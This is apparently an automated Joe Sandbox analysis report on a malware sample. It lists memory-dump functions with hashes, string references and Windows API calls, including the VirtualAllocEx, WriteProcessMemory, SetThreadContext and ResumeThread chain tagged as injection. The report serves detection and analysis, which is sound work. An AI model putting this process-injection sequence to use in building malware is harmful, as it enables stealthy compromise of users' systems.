Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1580000_ywKvCTGbQjXP.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: db922669e0a0c17ecb79f46a34df410243c6088af89565b0279d7bb510dacd48
Instruction ID: f747ba0ef78aec43cc0df73b372367a5134293f23902ae7ccb82a5dc2ef1132f
Opcode Fuzzy Hash: db922669e0a0c17ecb79f46a34df410243c6088af89565b0279d7bb510dacd48
Instruction Fuzzy Hash: 365136B0900249CFDB15EFAAD548B9EBBF1FF88318F208459D119BB2A0D7749984CF65

Function 07A26C81 Relevance: 5.3, Strings: 4, Instructions: 343
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

F, xrefs: 07A2733C
pbq, xrefs: 07A270A9
R, xrefs: 07A26F48
4'^q, xrefs: 07A2705C

Memory Dump Source

Source File: 00000009.00000002.1780832076.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a20000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID: 4'^q$F$R$pbq
API String ID: 0-2060940529
Opcode ID: 44fa683034d1d435fc8bdc84d87ed4d3ecb6b608bc36686939258b07cf85e42f
Instruction ID: d6318d115a3a706ba15e559a5c820eea7f36f409fa901b776ea994195a789378
Opcode Fuzzy Hash: 44fa683034d1d435fc8bdc84d87ed4d3ecb6b608bc36686939258b07cf85e42f
Instruction Fuzzy Hash: 0AD1D676600114EFCB0ACF99C984D59BBB2FF49314B1680A9E6199F272C732DD92EF50

Function 07A29250 Relevance: 3.8, Strings: 3, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8bq, xrefs: 07A29387
8bq, xrefs: 07A292DF
8bq, xrefs: 07A292CF

Memory Dump Source

Source File: 00000009.00000002.1780832076.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a20000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID: 8bq$8bq$8bq
API String ID: 0-4142397974
Opcode ID: b12f03ac6d67e6b0a7c0ebc3cd3a01c017c3161051bca31d4eecd43a24facd0b
Instruction ID: 0096033507d2eb97e1cc9cc59b7baea24437432107cf1f35822da8a5bea120f9
Opcode Fuzzy Hash: b12f03ac6d67e6b0a7c0ebc3cd3a01c017c3161051bca31d4eecd43a24facd0b
Instruction Fuzzy Hash: 393174B4A18226DBD7089B9C94505BF7776FBCAA10F10442AD527B7284DA35AC039BA2

Function 07A2839F Relevance: 3.8, Strings: 3, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 07A283E4
$^q, xrefs: 07A283F0
8, xrefs: 07A28413

Memory Dump Source

Source File: 00000009.00000002.1780832076.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a20000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID: 8$$^q$$^q
API String ID: 0-443845705
Opcode ID: a968875b421ed74b563f6a2d4cd2dbb149126814b00417f86c6efcaf68245343
Instruction ID: 5c1602dbba10a0f500153c5e750a4e24f700f892a7977e44d65f62af5ac0bdbb
Opcode Fuzzy Hash: a968875b421ed74b563f6a2d4cd2dbb149126814b00417f86c6efcaf68245343
Instruction Fuzzy Hash: BE014EB0B40255DFE7144B2CCC2675A7271BB50700F184C55F8169F281EAA89C91C392

Function 07A22AD8 Relevance: 2.7, Strings: 2, Instructions: 220
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 07A22B0B
(bq, xrefs: 07A22CB0

Memory Dump Source

Source File: 00000009.00000002.1780832076.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a20000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID: (bq$Hbq
API String ID: 0-4081012451
Opcode ID: 68b0f0f18cb270c355835458a1fd847dadc6bd901ff017ab8164883cea02c1aa
Instruction ID: 9865f35c906a617e3e81f800f0486f91d046935556b38582a55151252b0c9643
Opcode Fuzzy Hash: 68b0f0f18cb270c355835458a1fd847dadc6bd901ff017ab8164883cea02c1aa
Instruction Fuzzy Hash: 6371B1B5A002298FDB14DF69D5047AEBBF6FFC8310F158429D415AB390DB389D02DBA5

Function 07A2ED38 Relevance: 2.7, Strings: 2, Instructions: 160
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te^q, xrefs: 07A2EDF8
Te^q, xrefs: 07A2EE9A

Memory Dump Source

Source File: 00000009.00000002.1780832076.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a20000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID: Te^q$Te^q
API String ID: 0-3743469327
Opcode ID: 756905a88cd56051b0d6b35500bd39329961100a6b5c65a50f1d3caa8a6c2980
Instruction ID: 230efaded957885741e70905952688c95bf88e83c9497726eb5b2e64a491b006
Opcode Fuzzy Hash: 756905a88cd56051b0d6b35500bd39329961100a6b5c65a50f1d3caa8a6c2980
Instruction Fuzzy Hash: 7051D5B4E15219DFDB08CFE9C948AEDBBB6BF89300F10812AD819AB354DB345946DF50

Function 07A282D0 Relevance: 2.5, Strings: 2, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 07A282E6
$^q, xrefs: 07A282F2

Memory Dump Source

Source File: 00000009.00000002.1780832076.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a20000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: ed74498fa0c2611db461bc59fd506333c363dbda47e2a1554bf9f9bc9d74c2a7
Instruction ID: c53ade40c04b58b2b5d57cb27c44da3d617da81d367534e441f3a65565c407b4
Opcode Fuzzy Hash: ed74498fa0c2611db461bc59fd506333c363dbda47e2a1554bf9f9bc9d74c2a7
Instruction Fuzzy Hash: 730192B051E3658FD3198B2DD414265BBB5BB43344F0482ABF039CB142C7798887D79A

Function 07D45D0D Relevance: 1.7, APIs: 1, Instructions: 249
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07D45F4E

Memory Dump Source

Source File: 00000009.00000002.1781128317.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7d40000_ywKvCTGbQjXP.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 7ab98956ea54aef8e6b7b177c778a3b970dcd8a0d3c7915be96b7ca878494219
Instruction ID: b6a600a3ba465d63135d35fe95b0498df4a2e77e448494c8b8c0864043d4eb0f
Opcode Fuzzy Hash: 7ab98956ea54aef8e6b7b177c778a3b970dcd8a0d3c7915be96b7ca878494219
Instruction Fuzzy Hash: B6A18DB0D0021ADFDB10CF68D844BEDFBB2BF44314F1481A9E81AA7240DB749995CF92

Function 07D45D18 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07D45F4E

Memory Dump Source

Source File: 00000009.00000002.1781128317.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7d40000_ywKvCTGbQjXP.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e4e2c6148e4c721e08b292b2b92f01daaad3cca6f08a4552a014c977a8a5b87a
Instruction ID: 7ae69a18757bb1148f693ade70477213ee9d69bf7e3b02f0abaec79659e2ae2d
Opcode Fuzzy Hash: e4e2c6148e4c721e08b292b2b92f01daaad3cca6f08a4552a014c977a8a5b87a
Instruction Fuzzy Hash: 1A917CB1D0021ADFDB10CF68D840BEDFBB2BF48314F1481A9E85AA7250DB749995CF92

Function 0158B300 Relevance: 1.7, APIs: 1, Instructions: 203COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0158B566

Memory Dump Source

Source File: 00000009.00000002.1773991573.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1580000_ywKvCTGbQjXP.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 47e16b25c5db82d2b609f601fd3891c4f407c63212eb6839a1e43c3e63b32f41
Instruction ID: 0ff7cd1effbc5e1853358847b4a82d7e16e31e5868690b4052e8e899af781212
Opcode Fuzzy Hash: 47e16b25c5db82d2b609f601fd3891c4f407c63212eb6839a1e43c3e63b32f41
Instruction Fuzzy Hash: 99813570A00B458FDB25EF29D45575ABBF5FF88300F00892AD486EBB51DB74E849CB91

Function 0158590C Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 015859C9

Memory Dump Source

Source File: 00000009.00000002.1773991573.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1580000_ywKvCTGbQjXP.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: a3321f3098320104ddad00e3d929ea38322787ea93c28eead5b7f2b5bbc116f8
Instruction ID: 4398f4d1a23cb2308dc8a24f398133625513dc6f88ef5f3baab53d6c05231243
Opcode Fuzzy Hash: a3321f3098320104ddad00e3d929ea38322787ea93c28eead5b7f2b5bbc116f8
Instruction Fuzzy Hash: 0541C1B0C00619CFDB25DFA9C8847DDBBF5BF49304F24806AD409AB255DB755986CF50

Function 015844B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 015859C9

Memory Dump Source

Source File: 00000009.00000002.1773991573.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1580000_ywKvCTGbQjXP.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: dea5c0fc4a90ed1b6ce9211e1ff28d2018de61738b81e0d9ab01be0cb3cf2129
Instruction ID: 428a3b5bdde2dad8ec8eabae77781017dd8f8524a339fc5752b354e9fe377177
Opcode Fuzzy Hash: dea5c0fc4a90ed1b6ce9211e1ff28d2018de61738b81e0d9ab01be0cb3cf2129
Instruction Fuzzy Hash: 5F41E2B0C0071DCBDB24DFAAC88478EBBF5BF49304F20806AD409AB255EB755945CF90

Function 0647EFC2 Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 0647F05F

Memory Dump Source

Source File: 00000009.00000002.1780381741.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6470000_ywKvCTGbQjXP.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 01970ac86960dfe529dac37cf77be567b978529dfbac7ac7b4758c67644bcc8e
Instruction ID: ce0dd6b5a82faf9168f6b614c6c401f14bae4d912522dadaaa16a0264eb95c36
Opcode Fuzzy Hash: 01970ac86960dfe529dac37cf77be567b978529dfbac7ac7b4758c67644bcc8e
Instruction Fuzzy Hash: 0031C3B5D002499FDB51CF9AD884ADEFBF5FB48320F14842AE919A7310D775A544CFA0

Function 07D45A89 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07D45B20

Memory Dump Source

Source File: 00000009.00000002.1781128317.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7d40000_ywKvCTGbQjXP.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 5abd9ddd2f0701b8103da8e2d6c3b810a72c304f057c8b1382638de8ceec1bbd
Instruction ID: 5f156e98c540472cac8dcffb0945a77b8946f58d4885a4abed3460866d707686
Opcode Fuzzy Hash: 5abd9ddd2f0701b8103da8e2d6c3b810a72c304f057c8b1382638de8ceec1bbd
Instruction Fuzzy Hash: C22124B59003599FCB10CFA9D885BDEFBF4FF48310F10882AE959A7240C778A954CBA5

Function 0647EFC8 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 0647F05F

Memory Dump Source

Source File: 00000009.00000002.1780381741.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6470000_ywKvCTGbQjXP.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 16a60a245cb33d9d8a29f054fa0d8cc5a6dd298e352309f6a9f97304e2c6afee
Instruction ID: 9929826fc8e2c33c38b7cac51f84c0bfc124ad9e9cb8c407e5b344b20af5d749
Opcode Fuzzy Hash: 16a60a245cb33d9d8a29f054fa0d8cc5a6dd298e352309f6a9f97304e2c6afee
Instruction Fuzzy Hash: DE21CEB5D002499FDB50CF9AD884ADEFBF5FB48320F14842AE919A7310D775A944CFA0

Function 07D45A90 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07D45B20

Memory Dump Source

Source File: 00000009.00000002.1781128317.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7d40000_ywKvCTGbQjXP.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: ee43b1321889c2f11eb9027e6a25231b75fc8d59aba6daba205962b22103fbd5
Instruction ID: 7c97feb08a2fd91e280f0801300b995b6df1a98bf398710832ca817e9c62c3a2
Opcode Fuzzy Hash: ee43b1321889c2f11eb9027e6a25231b75fc8d59aba6daba205962b22103fbd5
Instruction Fuzzy Hash: E12125B59003599FCB10CFA9C885BDEFBF5FF48310F10882AE959A7250C778A954CBA4

Function 07D454B8 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07D4553E

Memory Dump Source

Source File: 00000009.00000002.1781128317.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7d40000_ywKvCTGbQjXP.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: af5108c90be8e4ff465e8b60a8e009210eb03ea04670188ade60986d7d2f8eb5
Instruction ID: 2d06495a696265bff569dc93c5f80295593af2a7b9ce211eb0583773f5a21433
Opcode Fuzzy Hash: af5108c90be8e4ff465e8b60a8e009210eb03ea04670188ade60986d7d2f8eb5
Instruction Fuzzy Hash: 072148B19002098FDB10DFAAC8857EEFBF5EF48324F148429D459A7241C7789545CFA5

Function 07D45B78 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07D45C00

Memory Dump Source

Source File: 00000009.00000002.1781128317.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7d40000_ywKvCTGbQjXP.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: aa1f806a6dd7df0feb57d28d91df858010c10df8cae3361e82cc905fbd1f2141
Instruction ID: 618d4c5f1b60628b0e0b1359b09a63c89984b236c02d483c8520157be7d27794
Opcode Fuzzy Hash: aa1f806a6dd7df0feb57d28d91df858010c10df8cae3361e82cc905fbd1f2141
Instruction Fuzzy Hash: 2B2125B19002599FCB10DFAAC881AEEFBF5FF48310F508829E959A7250C7389955CFA5

Function 0158D7C0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0158D84F

Memory Dump Source

Source File: 00000009.00000002.1773991573.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1580000_ywKvCTGbQjXP.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 859edd52f6631e1fb9cac3be99823b97004b32ca5a90b99d8daa6abd0b29a789
Instruction ID: e00d23cf827c177d00bc657915fdc97beda5b7596b569ad3ce69ad0fdaa566da
Opcode Fuzzy Hash: 859edd52f6631e1fb9cac3be99823b97004b32ca5a90b99d8daa6abd0b29a789
Instruction Fuzzy Hash: 3F2103B5900208DFDB10CFA9D984ADEBBF4FF08310F14842AE958A7250D334A951CF60

Function 07D45B80 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07D45C00

Memory Dump Source

Source File: 00000009.00000002.1781128317.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7d40000_ywKvCTGbQjXP.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 2eb5d7b5ed0fa70b795a060dcfaf163a47c5383b01adca266dff393e323499e5
Instruction ID: b148bbe81bf637f462aeb2f69c9941ac884181fd864f8d0fe5fc2e102ec6c4f0
Opcode Fuzzy Hash: 2eb5d7b5ed0fa70b795a060dcfaf163a47c5383b01adca266dff393e323499e5
Instruction Fuzzy Hash: 032128B19002599FCB10DFAAC881BDEFBF5FF48310F108429E559A7250C7389954CBA5

Function 07D454C0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07D4553E

Memory Dump Source

Source File: 00000009.00000002.1781128317.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7d40000_ywKvCTGbQjXP.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: b9161df894b9ca69ca9068ebb6d7ff99ea70c2e8cb77f7da91131e48629ae5fa
Instruction ID: 50e55726a86937f51c024154c2c703a8504129b5493f4c0dca85faeb9f6ba51d
Opcode Fuzzy Hash: b9161df894b9ca69ca9068ebb6d7ff99ea70c2e8cb77f7da91131e48629ae5fa
Instruction Fuzzy Hash: E32138B19002098FDB10DFAAC4857EEFBF5EF48324F148429D459A7240C7789945CFA5

Function 0158D7C8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0158D84F

Memory Dump Source

Source File: 00000009.00000002.1773991573.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1580000_ywKvCTGbQjXP.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: fe17a668484760cafbb1e35d409f2a3bf53d1e58de680188eeb157888df48d81
Instruction ID: ba4d8d1cea8e28b7a1d6790cb8e29a79b97a0a02c1bc15d0699180b62cdb8703
Opcode Fuzzy Hash: fe17a668484760cafbb1e35d409f2a3bf53d1e58de680188eeb157888df48d81
Instruction Fuzzy Hash: 6921C4B5900258DFDB10CF9AD984ADEBFF4FB48320F14841AE958A7350D375A944CFA5

Function 07D459C9 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07D45A3E

Memory Dump Source

Source File: 00000009.00000002.1781128317.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7d40000_ywKvCTGbQjXP.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5b06253c950bf314d7dfca757845a5779b101e5e8da0df50caa7e42376e235e1
Instruction ID: d6c5e44d8a94589d4e6404c56cf1c5dba4701585e2d276e72f3a2fa7456b34f0
Opcode Fuzzy Hash: 5b06253c950bf314d7dfca757845a5779b101e5e8da0df50caa7e42376e235e1
Instruction Fuzzy Hash: 702167B29002499FCB10DFA9D844BDEFFF5EF48320F208819E51AA7250C735A550CFA0

Function 07D459D0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07D45A3E

Memory Dump Source

Source File: 00000009.00000002.1781128317.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7d40000_ywKvCTGbQjXP.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1cb1aa412525578426918de675b1b3a5e4506b3b33afc09093ef4b4e86d57b5a
Instruction ID: ce8e6ee259f89a6af71becbfd73ab2a13c9ff533955415ce8338ad0a2eb3064e
Opcode Fuzzy Hash: 1cb1aa412525578426918de675b1b3a5e4506b3b33afc09093ef4b4e86d57b5a
Instruction Fuzzy Hash: 3D1167B29002499FCB10DFAAC845BDEFFF5EF88320F108819E51AA7250C735A554CFA0

Function 07D45408 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07D45472

Memory Dump Source

Source File: 00000009.00000002.1781128317.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7d40000_ywKvCTGbQjXP.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: deaa8b1bf24aad9b8b2a596a0a14d0e134bcb09e083932667fcbd256a42dc5af
Instruction ID: 3abde3810878d19d4e32befce3383fb01f1db18cb9f1bec747cb8a332f35c9b4
Opcode Fuzzy Hash: deaa8b1bf24aad9b8b2a596a0a14d0e134bcb09e083932667fcbd256a42dc5af
Instruction Fuzzy Hash: F61149B59002498FCB10DFAAD8457DEFFF4EB88324F248829D459A7250C735A544CB94

Function 07D49078 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 07D490DD

Memory Dump Source

Source File: 00000009.00000002.1781128317.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7d40000_ywKvCTGbQjXP.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: ed0a6be97d907b1d9be8cbfb7e3baf375bdb8ba9757328d705a89a43c90046ff
Instruction ID: 0b441ea281f25a44ddda11aeb01ec0fca4670f9d20cf053a7ac9b3d0ff9a2af2
Opcode Fuzzy Hash: ed0a6be97d907b1d9be8cbfb7e3baf375bdb8ba9757328d705a89a43c90046ff
Instruction Fuzzy Hash: AF1113B5800249DFDB10DF9AD888BDEFBF8EB49320F208419E954B7200C375A944CFA5

Function 07D45410 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07D45472

Memory Dump Source

Source File: 00000009.00000002.1781128317.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7d40000_ywKvCTGbQjXP.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 27bccc3b6a331421d701744d44f28f0071d0c19a81e07576d1a4da36545cbdf8
Instruction ID: b561f8f3040e59be1ac8aa98a1c460bd883ef1d7f974c375fb349d513fff93d1
Opcode Fuzzy Hash: 27bccc3b6a331421d701744d44f28f0071d0c19a81e07576d1a4da36545cbdf8
Instruction Fuzzy Hash: 5C113AB59002498FCB10DFAAC8457DEFBF4EB88324F208819D459A7250C775A544CFA5

Function 0158B500 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0158B566

Memory Dump Source

Source File: 00000009.00000002.1773991573.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1580000_ywKvCTGbQjXP.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 43da377a6b14d4959d4774aa92cc9f4442ab9ea9ad104e750a196bd083a15085
Instruction ID: 52f3c9be30cb7e58216eb4feb7e6b08d4bed2f07127321b3410c5268a95cf282
Opcode Fuzzy Hash: 43da377a6b14d4959d4774aa92cc9f4442ab9ea9ad104e750a196bd083a15085
Instruction Fuzzy Hash: A9110FB5D002498FDB10DF9AC844ADEFBF8AB88320F10842AD519B7210D379A545CFA5

Function 07D42704 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 07D490DD

Memory Dump Source

Source File: 00000009.00000002.1781128317.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7d40000_ywKvCTGbQjXP.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 8801b07d6ada6232871983dc1ad11706b4dd9240ebf269568367d6659cb413ef
Instruction ID: e8fc1d813683675b056e178e9fe6bcd9ea3dbfbe058df32c7d6e977f2dc41c09
Opcode Fuzzy Hash: 8801b07d6ada6232871983dc1ad11706b4dd9240ebf269568367d6659cb413ef
Instruction Fuzzy Hash: D111E0B59002499FCB20DF9AC988BDEFBF8EB48320F108419E559A7200C375A984CFA5

Function 07A22D98 Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

(bq, xrefs: 07A22F35

Memory Dump Source

Source File: 00000009.00000002.1780832076.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a20000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: 7adae9b4dc38bc8942f71df115b84acc19b477e9f02f75d5c2026014834dd231
Instruction ID: ac82d92e8c433c660430199670fea9c9d92a3a78b64d6d48ed672ca8a7e02a4f
Opcode Fuzzy Hash: 7adae9b4dc38bc8942f71df115b84acc19b477e9f02f75d5c2026014834dd231
Instruction Fuzzy Hash: C171C5B16002169FDB25DB29D4547AEBBE6FFC4300F10842AE4269B2E4CF38DD42DB50

Function 07A28E68 Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

$^q, xrefs: 07A28E7F

Memory Dump Source

Source File: 00000009.00000002.1780832076.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a20000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID: $^q
API String ID: 0-388095546
Opcode ID: 54f7f1fb6a792d79cf5021e95d804b307d62fc2f88c3baebf623a4a97a2be605
Instruction ID: dca351cbb15685f677926fa30e05968714f6a4f6ca4d101517e7d78cb313f194
Opcode Fuzzy Hash: 54f7f1fb6a792d79cf5021e95d804b307d62fc2f88c3baebf623a4a97a2be605
Instruction Fuzzy Hash: 891106B192C270FFC321976C94002657BF59B47204F1484ABF036CA592D63EC843A3A7

Function 07A282C1 Relevance: 1.3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

Strings

$^q, xrefs: 07A282E6

Memory Dump Source

Source File: 00000009.00000002.1780832076.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a20000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID: $^q
API String ID: 0-388095546
Opcode ID: cd450d3c51797a8479db37ebfdfcfa4759d3aa09022f95cafbe1776b4e4126e0
Instruction ID: 720a4343aef315febe3575197e5516f8a2cd51a3b262087471cac05f1a609f3a
Opcode Fuzzy Hash: cd450d3c51797a8479db37ebfdfcfa4759d3aa09022f95cafbe1776b4e4126e0
